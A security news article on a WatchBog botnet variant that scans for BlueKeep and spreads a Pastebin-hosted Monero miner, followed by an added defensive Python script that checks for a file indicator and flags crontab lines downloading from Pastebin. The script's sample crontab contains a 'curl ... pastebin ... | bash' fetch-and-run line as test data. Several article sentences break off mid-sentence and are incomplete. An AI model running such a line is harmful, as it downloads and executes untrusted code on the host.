Researchers at Intezer have discovered a new variant of WatchBog, a Linux-based cryptocurrency-mining botnet, that also includes a module to scan the Internet for Windows RDP servers vulnerable to BlueKeep (CVE-2019-0708).
“We have discovered a new version of WatchBog—a cryptocurrency-mining botnet operational since late 2018—that we suspect has compromised more than 4,500 Linux machines in newer campaigns taking place since early June.” reads a blog post published by Intezer.
“Among the new Linux exploits, this version of WatchBog implements a BlueKeep RDP protocol vulnerability scanner module, which suggests that
As explained by Microsoft, this vulnerability could be exploited by malware with
The new variant of the malware is currently undetected by most antivirus engines. The incorporation of the BlueKeep scanner suggests that its operators are also looking for ways to monetize Windows hosts.
The BlueKeep scanner implemented in WatchBog scans the Internet for vulnerable systems and submits an RC4-encrypted list of the RDP hosts it finds to servers controlled by its operators.
The malware also includes scanners for Jira and Solr flaws, along with a brute-forcing module for CouchDB and Redis installs.
“Once a vulnerable service is discovered for which an exploit module exists, the binary spreads itself by invoking the right exploit and installing a malicious bash script hosted on Pastebin.” continues the analysis.
“We were able to find an early test version of the spreader module uploaded to
Once it discovers a vulnerable system, WatchBog deploys a script on the targeted machine that downloads and executes a Monero miner from Pastebin.
The script gains persistence
Intezer experts recommend keeping software updated to its latest version. Linux users can check for the presence of WatchBog by verifying the existence of the “/tmp/.tmplassstgggzzzqpppppp12233333” file or the “/
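The following is an added example, not a tool from Intezer or from the article, of how a defender might script the check described above on a Linux host. It tests for the file indicator the article names and, as a heuristic of the editor's own (not an indicator from the article), flags crontab or script lines that fetch content from pastebin.com with curl or wget, since the article states that the dropper script is hosted on Pastebin. The `exists` parameter lets the file check be exercised without touching the real filesystem; `SAMPLE_CRONTAB` is constructed for the example and is not a captured WatchBog artefact.

```python
# Added example: WatchBog indicator check for Linux hosts.
# Not Intezer's or WatchBog's code. The Pastebin heuristic and the sample
# crontab are the editor's constructions, not indicators from the article.
import os
import re
from typing import Callable, List

# File indicator named in the article (the second path is truncated there, so
# only the first is included).
WATCHBOG_FILE_INDICATORS = ["/tmp/.tmplassstgggzzzqpppppp12233333"]

PASTEBIN_URL_RE = re.compile(r"https?://(?:www\.)?pastebin\.com/\S+", re.IGNORECASE)
FETCH_TOOL_RE = re.compile(r"\b(?:curl|wget)\b")


def present_indicators(paths: List[str],
                       exists: Callable[[str], bool] = os.path.lexists) -> List[str]:
    """Return the indicator paths that exist on this host.

    `exists` defaults to os.path.lexists (so a dangling symlink still counts);
    tests inject a stub instead of creating files.
    """
    return [p for p in paths if exists(p)]


def pastebin_fetch_lines(text: str) -> List[str]:
    """Return non-comment lines that fetch a pastebin.com URL with curl/wget.

    Heuristic: assumes persistence or staging via a Pastebin download, which
    the article describes for the dropper but does not give as an IOC.
    """
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if PASTEBIN_URL_RE.search(stripped) and FETCH_TOOL_RE.search(stripped):
            hits.append(stripped)
    return hits


# Constructed sample crontab for demonstration; the Pastebin path is a placeholder.
SAMPLE_CRONTAB = """\
# constructed sample, not a captured WatchBog crontab
0 * * * * /usr/bin/backup.sh
*/5 * * * * curl -fsSL https://pastebin.com/raw/XXXXXXXX | bash
30 2 * * * echo "see https://pastebin.com/notes" >> /var/log/notes.log
"""


def read_if_present(path: str) -> str:
    """Read a file's text, returning '' if it is missing or unreadable."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


if __name__ == "__main__":
    # Real-host check: file indicators plus system crontabs.
    found = present_indicators(WATCHBOG_FILE_INDICATORS)
    crontab_text = "".join(read_if_present(p) for p in ("/etc/crontab",))
    fetches = pastebin_fetch_lines(crontab_text)
    print("indicator files present:", found or "none")
    print("pastebin fetch lines in /etc/crontab:", fetches or "none")
    print("sample crontab hits:", pastebin_fetch_lines(SAMPLE_CRONTAB))
```

The fourth line of `SAMPLE_CRONTAB` mentions pastebin.com without downloading from it and is deliberately not flagged; a hunt that matched on the domain alone would drown in false positives. Per-user crontabs under /var/spool/cron are only readable as root, so run the script with the privileges needed to read them.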